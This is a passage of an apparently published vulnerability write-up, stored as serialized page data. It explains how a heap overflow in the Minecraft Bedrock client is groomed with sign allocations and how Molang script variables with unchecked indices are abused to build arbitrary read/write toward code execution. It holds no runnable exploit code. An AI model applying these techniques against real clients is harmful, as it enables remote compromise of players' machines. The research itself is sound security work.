",{"type":28,"tag":98,"props":151916,"children":151918},{"className":151917},[],[151919],{"type":33,"value":147779},{"type":33,"value":151921},"-sized chunks from the free list we allocate many signs of that size. The allocator will first reuse free-list entries and then create new regions when the free list is exhausted.",{"type":28,"tag":29,"props":151923,"children":151924},{},[151925],{"type":33,"value":151926},"After draining the free list, we spray the VS heap with many more chunks of the same size. If the free list has been emptied, most of these allocations will be contiguous, producing many adjacent sign allocations like:",{"type":28,"tag":234,"props":151928,"children":151930},{"code":151929},"+--------+--------+--------+--------+--------+\n|        |        |        |        |        |\n| Sign A | Sign B | Sign C | Sign D | Sign F |\n|        |        |        |        |        |\n+--------+--------+--------+--------+--------+\n",[151931],{"type":28,"tag":98,"props":151932,"children":151933},{"__ignoreMap":7},[151934],{"type":33,"value":151929},{"type":28,"tag":29,"props":151936,"children":151937},{},[151938,151940,151945,151947,151952],{"type":33,"value":151939},"Next we create ",{"type":28,"tag":2583,"props":151941,"children":151942},{},[151943],{"type":33,"value":151944},"holes",{"type":33,"value":151946}," in the contiguous spray by freeing every other sign allocation. That inserts ",{"type":28,"tag":98,"props":151948,"children":151950},{"className":151949},[],[151951],{"type":33,"value":147779},{"type":33,"value":151953},"-sized free chunks where we want them - directly below allocated sign chunks:",{"type":28,"tag":234,"props":151955,"children":151957},{"code":151956},"            Free              Free            \n+--------+--------+--------+--------+--------+\n|        |........|        |........|        |\n| Sign A |........| Sign C |........| Sign F |\n|        |........|        |........|        |\n+--------+--------+--------+--------+--------+\n",[151958],{"type":28,"tag":98,"props":151959,"children":151960},{"__ignoreMap":7},[151961],{"type":33,"value":151956},{"type":28,"tag":29,"props":151963,"children":151964},{},[151965,151967,151972,151974,151979],{"type":33,"value":151966},"When a ",{"type":28,"tag":98,"props":151968,"children":151970},{"className":151969},[],[151971],{"type":33,"value":147779},{"type":33,"value":151973}," allocation is later requested, the allocator will likely satisfy it from one of our inserted holes. As a result, the next adjacent allocated chunk’s ",{"type":28,"tag":98,"props":151975,"children":151977},{"className":151976},[],[151978],{"type":33,"value":151764},{"type":33,"value":151980}," field will be overwritten:",{"type":28,"tag":234,"props":151982,"children":151984},{"code":151983},"                           +--------+         \n            Free           |        |         \n+--------+--------+--------+ g->out +--------+\n|        |........|        |        |        |\n| Sign A |........| Sign C +--------+ Sign F |\n|        |........|        |        |        |\n+--------+--------+--------+        +--------+\n",[151985],{"type":28,"tag":98,"props":151986,"children":151987},{"__ignoreMap":7},[151988],{"type":33,"value":151983},{"type":28,"tag":29,"props":151990,"children":151991},{},[151992,151994,151999,152001,152006,152008,152013],{"type":33,"value":151993},"Once ",{"type":28,"tag":98,"props":151995,"children":151997},{"className":151996},[],[151998],{"type":33,"value":151764},{"type":33,"value":152000}," has been overwritten, ",{"type":28,"tag":98,"props":152002,"children":152004},{"className":152003},[],[152005],{"type":33,"value":147779},{"type":33,"value":152007}," allocation is freed immediately after, restoring the previous layout but with ",{"type":28,"tag":98,"props":152009,"children":152011},{"className":152010},[],[152012],{"type":33,"value":151764},{"type":33,"value":152014}," field corrupted:",{"type":28,"tag":234,"props":152016,"children":152018},{"code":152017},"                              UnsafeSize Overwritten\n                                        ^           \n                                        |           \n            Free              Free      |           \n+--------+--------+--------+--------+---+----+      \n|        |........|        |........|        |      \n| Sign A |........| Sign C |........| Sign F |      \n|        |........|        |........|        |      \n+--------+--------+--------+--------+--------+      \n",[152019],{"type":28,"tag":98,"props":152020,"children":152021},{"__ignoreMap":7},[152022],{"type":33,"value":152017},{"type":28,"tag":29,"props":152024,"children":152025},{},[152026],{"type":33,"value":152027},"To avoid adjacent-chunk consolidation in the next phase, we spray additional signs to fill the holes inside our contiguous region:",{"type":28,"tag":234,"props":152029,"children":152031},{"code":152030},"                              UnsafeSize Overwritten\n                                        ^           \n                                        |           \n                                        |           \n+--------+--------+--------+--------+---+----+      \n|        |        |        |        |        |      \n| Sign A | Sign B | Sign C | Sign D | Sign F |      \n|        |        |        |        |        |      \n+--------+--------+--------+--------+--------+      \n",[152032],{"type":28,"tag":98,"props":152033,"children":152034},{"__ignoreMap":7},[152035],{"type":33,"value":152030},{"type":28,"tag":29,"props":152037,"children":152038},{},[152039],{"type":33,"value":152040},"Finally, we free the rest of the contiguous spray. One of the freed allocations will have a corrupted (and likely overly large) size, giving us a much larger overflow:",{"type":28,"tag":234,"props":152042,"children":152044},{"code":152043},"                                       Freed Overwritten   \n                                               |           \n                                    +----------+----------+\n                                    |                     |\n   Free              Free           v                     v\n+--------+--------+--------+--------+--------+- - - - - - -\n|........|        |........|        |........|             \n|........| Sign B |........| Sign D |........| Other chunks\n|........|        |........|        |........|             \n+--------+--------+--------+--------+--------+- - - - - - -\n",[152045],{"type":28,"tag":98,"props":152046,"children":152047},{"__ignoreMap":7},[152048],{"type":33,"value":152043},{"type":28,"tag":18457,"props":152050,"children":152051},{},[],{"type":28,"tag":29,"props":152053,"children":152054},{},[152055],{"type":33,"value":152056},"This yields a substantially larger overflow primitive than the original 4-byte OOB. However, without an information leak, ASLR is still a big issue and finding a single ideal structure was difficult.",{"type":28,"tag":29,"props":152058,"children":152059},{},[152060],{"type":33,"value":152061},"Instead of looking for simple structures, we shifted focus to more complex server-controlled scripting systems executed by the client - eventually finding Molang.",{"type":28,"tag":75,"props":152063,"children":152065},{"id":152064},"molang",[152066],{"type":33,"value":152067},"Molang",{"type":28,"tag":29,"props":152069,"children":152070},{},[152071,152073,152080],{"type":33,"value":152072},"Molang is a Minecraft-specific scripting language designed for simple math operations and a lightweight state model. It typically controls client-side entity animations and can be included in resource packs delivered by the server. A high-level overview is available in the official ",{"type":28,"tag":87,"props":152074,"children":152077},{"href":152075,"rel":152076},"https://learn.microsoft.com/en-us/minecraft/creator/documents/molang/syntax-guide?view=minecraft-bedrock-stable",[91],[152078],{"type":33,"value":152079},"syntax guide",{"type":33,"value":141},{"type":28,"tag":29,"props":152082,"children":152083},{},[152084,152086,152091,152092,152097],{"type":33,"value":152085},"The available base types are simple: numbers are 32-bit floats, and there is a string type for which only the ",{"type":28,"tag":98,"props":152087,"children":152089},{"className":152088},[],[152090],{"type":33,"value":2340},{"type":33,"value":10659},{"type":28,"tag":98,"props":152093,"children":152095},{"className":152094},[],[152096],{"type":33,"value":15350},{"type":33,"value":152098}," operators are supported.",{"type":28,"tag":29,"props":152100,"children":152101},{},[152102,152104,152110,152112,152117,152119,152124,152125,152130,152131],{"type":33,"value":152103},"Variables are defined by prepending ",{"type":28,"tag":98,"props":152105,"children":152107},{"className":152106},[],[152108],{"type":33,"value":152109},"variable.",{"type":33,"value":152111}," to the name and assigning a value. For example, to define ",{"type":28,"tag":98,"props":152113,"children":152115},{"className":152114},[],[152116],{"type":33,"value":8751},{"type":33,"value":152118}," as the sum of ",{"type":28,"tag":98,"props":152120,"children":152122},{"className":152121},[],[152123],{"type":33,"value":87},{"type":33,"value":10659},{"type":28,"tag":98,"props":152126,"children":152128},{"className":152127},[],[152129],{"type":33,"value":2893},{"type":33,"value":14994},{"type":28,"tag":98,"props":152132,"children":152134},{"className":152133},[],[152135],{"type":33,"value":152136},"variable.result = variable.a + variable.b;",{"type":28,"tag":29,"props":152138,"children":152139},{},[152140,152142,152147,152148,152153,152154,152159,152160,152165],{"type":33,"value":152141},"Logical operators such as ",{"type":28,"tag":98,"props":152143,"children":152145},{"className":152144},[],[152146],{"type":33,"value":22081},{"type":33,"value":825},{"type":28,"tag":98,"props":152149,"children":152151},{"className":152150},[],[152152],{"type":33,"value":72815},{"type":33,"value":825},{"type":28,"tag":98,"props":152155,"children":152157},{"className":152156},[],[152158],{"type":33,"value":514},{"type":33,"value":825},{"type":28,"tag":98,"props":152161,"children":152163},{"className":152162},[],[152164],{"type":33,"value":645},{"type":33,"value":152166},", etc., are supported, and conditional branching is implemented using ternary-style blocks:",{"type":28,"tag":234,"props":152168,"children":152170},{"code":152169},"(variable.result == 3) ? {\n    return 1;\n} : {\n    return 0;\n}\n",[152171],{"type":28,"tag":98,"props":152172,"children":152173},{"__ignoreMap":7},[152174],{"type":33,"value":152169},{"type":28,"tag":29,"props":152176,"children":152177},{},[152178],{"type":33,"value":152179},"As shown, Molang is very simple, but we hoped it would be sufficient as a second-stage payload to achieve client-side arbitrary read and write.",{"type":28,"tag":443,"props":152181,"children":152183},{"id":152182},"molang-internals",[152184],{"type":33,"value":152185},"Molang Internals",{"type":28,"tag":29,"props":152187,"children":152188},{},[152189],{"type":33,"value":152190},"What interested us most was how variables are handled. Specifically, we wondered whether we could use the overflow to corrupt a variable and then leverage that corrupted variable to perform arbitrary reads - leaking the information needed to bypass ASLR inside the Molang script, and subsequently use those leaks to carry out arbitrary writes.",{"type":28,"tag":29,"props":152192,"children":152193},{},[152194],{"type":33,"value":152195},"Below we describe the structures involved and their memory layout.",{"type":28,"tag":443,"props":152197,"children":152199},{"id":152198},"molangvariable-and-molangscriptarg",[152200],{"type":33,"value":152201},"MolangVariable and MolangScriptArg",{"type":28,"tag":29,"props":152203,"children":152204},{},[152205,152206,152212],{"type":33,"value":101965},{"type":28,"tag":98,"props":152207,"children":152209},{"className":152208},[],[152210],{"type":33,"value":152211},"MolangVariable",{"type":33,"value":152213}," structure is created for every declared variable. Simplified, it looks something like this:",{"type":28,"tag":234,"props":152215,"children":152217},{"code":152216,"language":1797,"meta":7,"className":16176,"style":7},"struct MolangVariable {\n    \n    struct HashedString {\n        uint64_t variable_name_hash;\n        std::string variable_name;\n    };\n    \n    struct MolangScriptArg {\n        uint32_t value_type;\n        uint64_t value;\n        std::vector\u003Cstruct MolangScriptArg> struct_fields;\n        \n        [...]\n    };\n};\n",[152218],{"type":28,"tag":98,"props":152219,"children":152220},{"__ignoreMap":7},[152221,152233,152240,152252,152265,152273,152280,152287,152299,152312,152324,152354,152362,152369,152376],{"type":28,"tag":116,"props":152222,"children":152223},{"class":245,"line":246},[152224,152228],{"type":28,"tag":116,"props":152225,"children":152226},{"style":376},[152227],{"type":33,"value":9069},{"type":28,"tag":116,"props":152229,"children":152230},{"style":266},[152231],{"type":33,"value":152232}," MolangVariable {\n",{"type":28,"tag":116,"props":152234,"children":152235},{"class":245,"line":256},[152236],{"type":28,"tag":116,"props":152237,"children":152238},{"style":266},[152239],{"type":33,"value":61405},{"type":28,"tag":116,"props":152241,"children":152242},{"class":245,"line":293},[152243,152247],{"type":28,"tag":116,"props":152244,"children":152245},{"style":376},[152246],{"type":33,"value":5723},{"type":28,"tag":116,"props":152248,"children":152249},{"style":266},[152250],{"type":33,"value":152251}," HashedString {\n",{"type":28,"tag":116,"props":152253,"children":152254},{"class":245,"line":361},[152255,152260],{"type":28,"tag":116,"props":152256,"children":152257},{"style":376},[152258],{"type":33,"value":152259},"        uint64_t",{"type":28,"tag":116,"props":152261,"children":152262},{"style":266},[152263],{"type":33,"value":152264}," variable_name_hash;\n",{"type":28,"tag":116,"props":152266,"children":152267},{"class":245,"line":387},[152268],{"type":28,"tag":116,"props":152269,"children":152270},{"style":266},[152271],{"type":33,"value":152272},"        std::string variable_name;\n",{"type":28,"tag":116,"props":152274,"children":152275},{"class":245,"line":400},[152276],{"type":28,"tag":116,"props":152277,"children":152278},{"style":266},[152279],{"type":33,"value":38618},{"type":28,"tag":116,"props":152281,"children":152282},{"class":245,"line":614},[152283],{"type":28,"tag":116,"props":152284,"children":152285},{"style":266},[152286],{"type":33,"value":61405},{"type":28,"tag":116,"props":152288,"children":152289},{"class":245,"line":631},[152290,152294],{"type":28,"tag":116,"props":152291,"children":152292},{"style":376},[152293],{"type":33,"value":5723},{"type":28,"tag":116,"props":152295,"children":152296},{"style":266},[152297],{"type":33,"value":152298}," MolangScriptArg {\n",{"type":28,"tag":116,"props":152300,"children":152301},{"class":245,"line":665},[152302,152307],{"type":28,"tag":116,"props":152303,"children":152304},{"style":376},[152305],{"type":33,"value":152306},"        uint32_t",{"type":28,"tag":116,"props":152308,"children":152309},{"style":266},[152310],{"type":33,"value":152311}," value_type;\n",{"type":28,"tag":116,"props":152313,"children":152314},{"class":245,"line":713},[152315,152319],{"type":28,"tag":116,"props":152316,"children":152317},{"style":376},[152318],{"type":33,"value":152259},{"type":28,"tag":116,"props":152320,"children":152321},{"style":266},[152322],{"type":33,"value":152323}," value;\n",{"type":28,"tag":116,"props":152325,"children":152326},{"class":245,"line":750},[152327,152332,152336,152340,152345,152349],{"type":28,"tag":116,"props":152328,"children":152329},{"style":266},[152330],{"type":33,"value":152331},"        std::vector",{"type":28,"tag":116,"props":152333,"children":152334},{"style":370},[152335],{"type":33,"value":514},{"type":28,"tag":116,"props":152337,"children":152338},{"style":376},[152339],{"type":33,"value":9069},{"type":28,"tag":116,"props":152341,"children":152342},{"style":266},[152343],{"type":33,"value":152344}," MolangScriptArg",{"type":28,"tag":116,"props":152346,"children":152347},{"style":370},[152348],{"type":33,"value":645},{"type":28,"tag":116,"props":152350,"children":152351},{"style":266},[152352],{"type":33,"value":152353}," struct_fields;\n",{"type":28,"tag":116,"props":152355,"children":152356},{"class":245,"line":779},[152357],{"type":28,"tag":116,"props":152358,"children":152359},{"style":266},[152360],{"type":33,"value":152361},"        \n",{"type":28,"tag":116,"props":152363,"children":152364},{"class":245,"line":796},[152365],{"type":28,"tag":116,"props":152366,"children":152367},{"style":266},[152368],{"type":33,"value":123652},{"type":28,"tag":116,"props":152370,"children":152371},{"class":245,"line":847},[152372],{"type":28,"tag":116,"props":152373,"children":152374},{"style":266},[152375],{"type":33,"value":38618},{"type":28,"tag":116,"props":152377,"children":152378},{"class":245,"line":898},[152379],{"type":28,"tag":116,"props":152380,"children":152381},{"style":266},[152382],{"type":33,"value":16239},{"type":28,"tag":29,"props":152384,"children":152385},{},[152386,152388,152393],{"type":33,"value":152387},"In memory a ",{"type":28,"tag":98,"props":152389,"children":152391},{"className":152390},[],[152392],{"type":33,"value":152211},{"type":33,"value":152394}," instance resembles:",{"type":28,"tag":234,"props":152396,"children":152398},{"code":152397},"      +---------------+---------------+\n+0x00 |  FNV-1 hash   |std::string.buf|\n      +---------------+---------------+\n+0x10 |std::string.buf|std::string.len|\n      +---------------+---------------+\n+0x20 |std::string.cap|   Unknown     |\n      +-------+-------+---------------+\n+0x30 | Type  |Unused |Variable value |\n      +-------+-------+---------------+\n+0x40 |std::vector.buf|std::vector.len|\n      +---------------+---------------+\n+0x50 |std::vector.cap|   Unknown     |\n      +---------------+---------------+\n      |     . . .     |     . . .     |\n",[152399],{"type":28,"tag":98,"props":152400,"children":152401},{"__ignoreMap":7},[152402],{"type":33,"value":152397},{"type":28,"tag":29,"props":152404,"children":152405},{},[152406],{"type":33,"value":152407},"For reference, example debugger view of the layout:",{"type":28,"tag":29,"props":152409,"children":152410},{},[152411],{"type":28,"tag":206,"props":152412,"children":152414},{"alt":50198,"src":152413},"/posts/minecraft-heap-overflow-to-rce/image8.png",[],{"type":28,"tag":29,"props":152416,"children":152417},{},[152418],{"type":33,"value":152419},"The full structure is larger and contains more fields than shown, but many are irrelevant to the exploit.",{"type":28,"tag":29,"props":152421,"children":152422},{},[152423,152425,152431,152433,152438,152440,152446,152448,152453,152454,152459,152461,152466,152467,152473,152474,152480],{"type":33,"value":152424},"We only care about the ",{"type":28,"tag":98,"props":152426,"children":152428},{"className":152427},[],[152429],{"type":33,"value":152430},"MolangScriptArg",{"type":33,"value":152432}," beginning at offset ",{"type":28,"tag":98,"props":152434,"children":152436},{"className":152435},[],[152437],{"type":33,"value":128531},{"type":33,"value":152439}," because it contains variable values. In the screenshot above, the ",{"type":28,"tag":98,"props":152441,"children":152443},{"className":152442},[],[152444],{"type":33,"value":152445},"value_type",{"type":33,"value":152447}," at ",{"type":28,"tag":98,"props":152449,"children":152451},{"className":152450},[],[152452],{"type":33,"value":128531},{"type":33,"value":5172},{"type":28,"tag":98,"props":152455,"children":152457},{"className":152456},[],[152458],{"type":33,"value":353},{"type":33,"value":152460}," (meaning float), and the ",{"type":28,"tag":98,"props":152462,"children":152464},{"className":152463},[],[152465],{"type":33,"value":38773},{"type":33,"value":152447},{"type":28,"tag":98,"props":152468,"children":152470},{"className":152469},[],[152471],{"type":33,"value":152472},"0x38",{"type":33,"value":5172},{"type":28,"tag":98,"props":152475,"children":152477},{"className":152476},[],[152478],{"type":33,"value":152479},"0xbf2070c8",{"type":33,"value":141},{"type":28,"tag":29,"props":152482,"children":152483},{},[152484,152486,152492,152494,152499,152501,152506,152507,152512,152514,152519,152521,152526],{"type":33,"value":152485},"During assignment, such as ",{"type":28,"tag":98,"props":152487,"children":152489},{"className":152488},[],[152490],{"type":33,"value":152491},"variable.a = variable.b",{"type":33,"value":152493},", each field of ",{"type":28,"tag":98,"props":152495,"children":152497},{"className":152496},[],[152498],{"type":33,"value":152430},{"type":33,"value":152500}," is copied from variable ",{"type":28,"tag":98,"props":152502,"children":152504},{"className":152503},[],[152505],{"type":33,"value":2893},{"type":33,"value":56395},{"type":28,"tag":98,"props":152508,"children":152510},{"className":152509},[],[152511],{"type":33,"value":87},{"type":33,"value":152513},". Interestingly, the ",{"type":28,"tag":98,"props":152515,"children":152517},{"className":152516},[],[152518],{"type":33,"value":38773},{"type":33,"value":152520}," field is always copied as a ",{"type":28,"tag":98,"props":152522,"children":152524},{"className":152523},[],[152525],{"type":33,"value":55253},{"type":33,"value":152527}," even if the type is a 32-bit float.",{"type":28,"tag":29,"props":152529,"children":152530},{},[152531,152533,152539],{"type":33,"value":152532},"Each entity stores its variables in a per-entity vector called ",{"type":28,"tag":98,"props":152534,"children":152536},{"className":152535},[],[152537],{"type":33,"value":152538},"MolangVariableMap",{"type":33,"value":141},{"type":28,"tag":443,"props":152541,"children":152543},{"id":152542},"molangvariablemap",[152544],{"type":33,"value":152538},{"type":28,"tag":29,"props":152546,"children":152547},{},[152548,152553,152555,152561,152563,152569],{"type":28,"tag":98,"props":152549,"children":152551},{"className":152550},[],[152552],{"type":33,"value":152538},{"type":33,"value":152554}," is simply a ",{"type":28,"tag":98,"props":152556,"children":152558},{"className":152557},[],[152559],{"type":33,"value":152560},"std::vector\u003CMolangVariable *>",{"type":33,"value":152562}," contained per entity. To reason about its memory we need to recall MSVC ",{"type":28,"tag":98,"props":152564,"children":152566},{"className":152565},[],[152567],{"type":33,"value":152568},"std::vector",{"type":33,"value":152570}," layout:",{"type":28,"tag":234,"props":152572,"children":152574},{"code":152573,"language":1797,"meta":7,"className":16176,"style":7},"struct vector {\n    void *buf;\n    void *len;\n    void *cap;\n};\n",[152575],{"type":28,"tag":98,"props":152576,"children":152577},{"__ignoreMap":7},[152578,152590,152606,152622,152638],{"type":28,"tag":116,"props":152579,"children":152580},{"class":245,"line":246},[152581,152585],{"type":28,"tag":116,"props":152582,"children":152583},{"style":376},[152584],{"type":33,"value":9069},{"type":28,"tag":116,"props":152586,"children":152587},{"style":266},[152588],{"type":33,"value":152589}," vector {\n",{"type":28,"tag":116,"props":152591,"children":152592},{"class":245,"line":256},[152593,152597,152601],{"type":28,"tag":116,"props":152594,"children":152595},{"style":376},[152596],{"type":33,"value":16209},{"type":28,"tag":116,"props":152598,"children":152599},{"style":370},[152600],{"type":33,"value":9484},{"type":28,"tag":116,"props":152602,"children":152603},{"style":266},[152604],{"type":33,"value":152605},"buf;\n",{"type":28,"tag":116,"props":152607,"children":152608},{"class":245,"line":293},[152609,152613,152617],{"type":28,"tag":116,"props":152610,"children":152611},{"style":376},[152612],{"type":33,"value":16209},{"type":28,"tag":116,"props":152614,"children":152615},{"style":370},[152616],{"type":33,"value":9484},{"type":28,"tag":116,"props":152618,"children":152619},{"style":266},[152620],{"type":33,"value":152621},"len;\n",{"type":28,"tag":116,"props":152623,"children":152624},{"class":245,"line":361},[152625,152629,152633],{"type":28,"tag":116,"props":152626,"children":152627},{"style":376},[152628],{"type":33,"value":16209},{"type":28,"tag":116,"props":152630,"children":152631},{"style":370},[152632],{"type":33,"value":9484},{"type":28,"tag":116,"props":152634,"children":152635},{"style":266},[152636],{"type":33,"value":152637},"cap;\n",{"type":28,"tag":116,"props":152639,"children":152640},{"class":245,"line":387},[152641],{"type":28,"tag":116,"props":152642,"children":152643},{"style":266},[152644],{"type":33,"value":16239},{"type":28,"tag":29,"props":152646,"children":152647},{},[152648,152653,152655,152660,152662,152668,152670,152675,152676,152681],{"type":28,"tag":98,"props":152649,"children":152651},{"className":152650},[],[152652],{"type":33,"value":149735},{"type":33,"value":152654}," points to the allocated array of elements, ",{"type":28,"tag":98,"props":152656,"children":152658},{"className":152657},[],[152659],{"type":33,"value":8807},{"type":33,"value":152661}," points just past the last used element, and ",{"type":28,"tag":98,"props":152663,"children":152665},{"className":152664},[],[152666],{"type":33,"value":152667},"cap",{"type":33,"value":152669}," points to the end of the allocated buffer. Notably, the types of ",{"type":28,"tag":98,"props":152671,"children":152673},{"className":152672},[],[152674],{"type":33,"value":8807},{"type":33,"value":10659},{"type":28,"tag":98,"props":152677,"children":152679},{"className":152678},[],[152680],{"type":33,"value":152667},{"type":33,"value":152682}," aren't typical integer types for sizes, but both are pointers.",{"type":28,"tag":29,"props":152684,"children":152685},{},[152686],{"type":33,"value":152687},"Example layout for a vector holding three variable pointers plus one unused slot:",{"type":28,"tag":234,"props":152689,"children":152691},{"code":152690},"+---------+         +--------------------+\n|   buf   +-------> | MolangVariable A*  |\n+---------+         +--------------------+\n|   len   +----+    | MolangVariable B*  |\n+---------+    |    +--------------------+\n|   cap   |    |    | MolangVariable C*  |\n+----+----+    |    +--------------------+\n     |         +--> | Empty element slot |\n     |              +--------------------+\n     |                                   ^\n     +-----------------------------------+\n",[152692],{"type":28,"tag":98,"props":152693,"children":152694},{"__ignoreMap":7},[152695],{"type":33,"value":152690},{"type":28,"tag":29,"props":152697,"children":152698},{},[152699,152701,152707,152709,152715],{"type":33,"value":152700},"Because each entity can create and initialize variables independently, the indices of specific variables (e.g., ",{"type":28,"tag":98,"props":152702,"children":152704},{"className":152703},[],[152705],{"type":33,"value":152706},"variable.result",{"type":33,"value":152708},") may differ between entities. To get around this, ",{"type":28,"tag":98,"props":152710,"children":152712},{"className":152711},[],[152713],{"type":33,"value":152714},"MolangIndexMap",{"type":33,"value":152716}," is used to map a global variable name to the correct per-entity slot.",{"type":28,"tag":443,"props":152718,"children":152720},{"id":152719},"molangindexmap",[152721],{"type":33,"value":152714},{"type":28,"tag":29,"props":152723,"children":152724},{},[152725,152730,152732,152738,152740,152746],{"type":28,"tag":98,"props":152726,"children":152728},{"className":152727},[],[152729],{"type":33,"value":152714},{"type":33,"value":152731}," is a per-entity ",{"type":28,"tag":98,"props":152733,"children":152735},{"className":152734},[],[152736],{"type":33,"value":152737},"std::vector\u003Cuint16_t>",{"type":33,"value":152739},". The engine maintains a global hashmap that maps variable names to a global index. When the client encounters a statement like ",{"type":28,"tag":98,"props":152741,"children":152743},{"className":152742},[],[152744],{"type":33,"value":152745},"variable.result = 0",{"type":33,"value":152747}," it:",{"type":28,"tag":455,"props":152749,"children":152750},{},[152751,152761,152771],{"type":28,"tag":459,"props":152752,"children":152753},{},[152754,152756],{"type":33,"value":152755},"Checks the global hashmap for ",{"type":28,"tag":98,"props":152757,"children":152759},{"className":152758},[],[152760],{"type":33,"value":8751},{"type":28,"tag":459,"props":152762,"children":152763},{},[152764,152766],{"type":33,"value":152765},"If found, uses the global index to look up the per-entity index in ",{"type":28,"tag":98,"props":152767,"children":152769},{"className":152768},[],[152770],{"type":33,"value":152714},{"type":28,"tag":459,"props":152772,"children":152773},{},[152774,152776],{"type":33,"value":152775},"If not found, creates a new global entry and assigns it ",{"type":28,"tag":98,"props":152777,"children":152779},{"className":152778},[],[152780],{"type":33,"value":152781},"last_index + 1",{"type":28,"tag":29,"props":152783,"children":152784},{},[152785,152787,152792,152794,152799,152801,152806,152808,152813,152815,152820,152821,152827,152829,152834],{"type":33,"value":152786},"This means the same global index for variable ",{"type":28,"tag":98,"props":152788,"children":152790},{"className":152789},[],[152791],{"type":33,"value":8751},{"type":33,"value":152793}," maps to the same position inside every entity’s ",{"type":28,"tag":98,"props":152795,"children":152797},{"className":152796},[],[152798],{"type":33,"value":152714},{"type":33,"value":152800},", but the actual ",{"type":28,"tag":98,"props":152802,"children":152804},{"className":152803},[],[152805],{"type":33,"value":152211},{"type":33,"value":152807}," for ",{"type":28,"tag":98,"props":152809,"children":152811},{"className":152810},[],[152812],{"type":33,"value":8751},{"type":33,"value":152814}," may live at different slots inside each entity's ",{"type":28,"tag":98,"props":152816,"children":152818},{"className":152817},[],[152819],{"type":33,"value":152538},{"type":33,"value":18195},{"type":28,"tag":98,"props":152822,"children":152824},{"className":152823},[],[152825],{"type":33,"value":152826},"Entity.MolangIndexMap[global_index]",{"type":33,"value":152828}," stores the per-entity index (slot) of variable ",{"type":28,"tag":98,"props":152830,"children":152832},{"className":152831},[],[152833],{"type":33,"value":8751},{"type":33,"value":141},{"type":28,"tag":29,"props":152836,"children":152837},{},[152838,152840,152845,152847,152852,152854,152859,152861,152866,152868,152874,152876,152881],{"type":33,"value":152839},"Importantly, we found that indices in the ",{"type":28,"tag":98,"props":152841,"children":152843},{"className":152842},[],[152844],{"type":33,"value":152714},{"type":33,"value":152846}," are trusted and the client does not validate that a per-entity index actually lies within the bounds of that entity’s ",{"type":28,"tag":98,"props":152848,"children":152850},{"className":152849},[],[152851],{"type":33,"value":152538},{"type":33,"value":152853},". This means that if we overwrite the index of variable ",{"type":28,"tag":98,"props":152855,"children":152857},{"className":152856},[],[152858],{"type":33,"value":8751},{"type":33,"value":152860}," (an example, it can be any variable) with the chunk overlap and make it out-of-bounds for that entity’s ",{"type":28,"tag":98,"props":152862,"children":152864},{"className":152863},[],[152865],{"type":33,"value":152538},{"type":33,"value":152867},", we could read from and write to ",{"type":28,"tag":98,"props":152869,"children":152871},{"className":152870},[],[152872],{"type":33,"value":152873},"address + 0x38",{"type":33,"value":152875}," through ",{"type":28,"tag":98,"props":152877,"children":152879},{"className":152878},[],[152880],{"type":33,"value":152706},{"type":33,"value":141},{"type":28,"tag":75,"props":152883,"children":152885},{"id":152884},"building-a-molang-arbitrary-rw-primitive",[152886],{"type":33,"value":152887},"Building a Molang Arbitrary R/W Primitive",{"type":28,"tag":29,"props":152889,"children":152890},{},[152891,152893,152898,152900,152905],{"type":33,"value":152892},"We needed some pointer inside a heap-sprayable object that we could use to build an arbitrary read/write primitive in Molang. Eventually, we came up with the thought of using internal pointers of ",{"type":28,"tag":98,"props":152894,"children":152896},{"className":152895},[],[152897],{"type":33,"value":152568},{"type":33,"value":152899}," - specifically, of ",{"type":28,"tag":98,"props":152901,"children":152903},{"className":152902},[],[152904],{"type":33,"value":152538},{"type":33,"value":152906}," vector.",{"type":28,"tag":29,"props":152908,"children":152909},{},[152910,152912,152917,152919,152924,152925,152930,152932,152937],{"type":33,"value":152911},"Because every entity object is heap-allocated and contains a ",{"type":28,"tag":98,"props":152913,"children":152915},{"className":152914},[],[152916],{"type":33,"value":152538},{"type":33,"value":152918}," vector, we realised we might be able to overwrite a variable index so it reads the ",{"type":28,"tag":98,"props":152920,"children":152922},{"className":152921},[],[152923],{"type":33,"value":149735},{"type":33,"value":55410},{"type":28,"tag":98,"props":152926,"children":152928},{"className":152927},[],[152929],{"type":33,"value":152538},{"type":33,"value":152931}," vector belonging to an entity object placed just next the ",{"type":28,"tag":98,"props":152933,"children":152935},{"className":152934},[],[152936],{"type":33,"value":152538},{"type":33,"value":152938}," allocated buffer.",{"type":28,"tag":234,"props":152940,"children":152942},{"code":152941},"      +-------------+ \u003C--+                   \n+---> | variable.a  |    |                   \n|     +-------------+    |                   \n|     | variable.b  |    |                   \n|     +-------------+    +- MolangVariableMap allocated buffer\n|     |    . . .    |    |                   \n|     +-------------+    |                   \n|     | variable.f  |    |                   \n|     +-------------+ \u003C--+--+                \n|     |             |       |                \n|     |             |       |                \n|     |             |       |                \n|     |             |       |                \n|     +------+------+       +- Entity Object \n+-----+ buf  | len  |       |                \n      +------+------+       |                \n      | cap  |      |       |                \n      +------+      |       |                \n      +-------------+ \u003C-----+                                       \n",[152943],{"type":28,"tag":98,"props":152944,"children":152945},{"__ignoreMap":7},[152946],{"type":33,"value":152941},{"type":28,"tag":29,"props":152948,"children":152949},{},[152950,152952,152957,152959,152965,152967,152972,152973,152979,152980,152985,152987,152992,152994,152999,153001,153006,153008,153013,153015,153020,153022,153027,153029,153035,153037,153042,153044,153049],{"type":33,"value":152951},"In the scenario above, the ",{"type":28,"tag":98,"props":152953,"children":152955},{"className":152954},[],[152956],{"type":33,"value":152714},{"type":33,"value":152958}," would map ",{"type":28,"tag":98,"props":152960,"children":152962},{"className":152961},[],[152963],{"type":33,"value":152964},"variable.a",{"type":33,"value":152966}," -> index ",{"type":28,"tag":98,"props":152968,"children":152970},{"className":152969},[],[152971],{"type":33,"value":353},{"type":33,"value":825},{"type":28,"tag":98,"props":152974,"children":152976},{"className":152975},[],[152977],{"type":33,"value":152978},"variable.b",{"type":33,"value":152966},{"type":28,"tag":98,"props":152981,"children":152983},{"className":152982},[],[152984],{"type":33,"value":1824},{"type":33,"value":152986},", and so on. If we overwrite the index for ",{"type":28,"tag":98,"props":152988,"children":152990},{"className":152989},[],[152991],{"type":33,"value":152964},{"type":33,"value":152993}," with a value that is out-of-bounds for the ",{"type":28,"tag":98,"props":152995,"children":152997},{"className":152996},[],[152998],{"type":33,"value":152538},{"type":33,"value":153000},", it can instead index the ",{"type":28,"tag":98,"props":153002,"children":153004},{"className":153003},[],[153005],{"type":33,"value":149735},{"type":33,"value":153007}," field of the entity object above. Reading ",{"type":28,"tag":98,"props":153009,"children":153011},{"className":153010},[],[153012],{"type":33,"value":152964},{"type":33,"value":153014}," will then return the pointer stored at offset 